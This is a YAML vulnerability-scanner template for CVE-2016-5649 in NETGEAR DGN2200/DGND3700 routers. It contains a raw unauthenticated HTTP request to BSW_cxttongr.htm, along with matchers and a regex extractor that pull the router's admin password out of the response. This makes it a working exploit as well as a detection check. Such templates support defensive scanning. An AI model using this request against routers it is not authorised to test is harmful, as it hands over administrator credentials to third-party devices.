46 lines
1.4 KiB
YAML
46 lines
1.4 KiB
YAML
id: CVE-2016-5649
|
|
|
|
info:
|
|
name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
|
|
author: suman_kar
|
|
severity: critical
|
|
description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-5649
|
|
- https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html
|
|
- http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2016-5649
|
|
cwe-id: CWE-200
|
|
tags: cve,cve2016,iot,netgear,router,packetstorm
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /BSW_cxttongr.htm HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "<title>Smart Wizard Result</title> "
|
|
part: body
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: password
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '<b>Success "([a-z]+)"'
|
|
|
|
# Enhanced by mp on 2022/05/10
|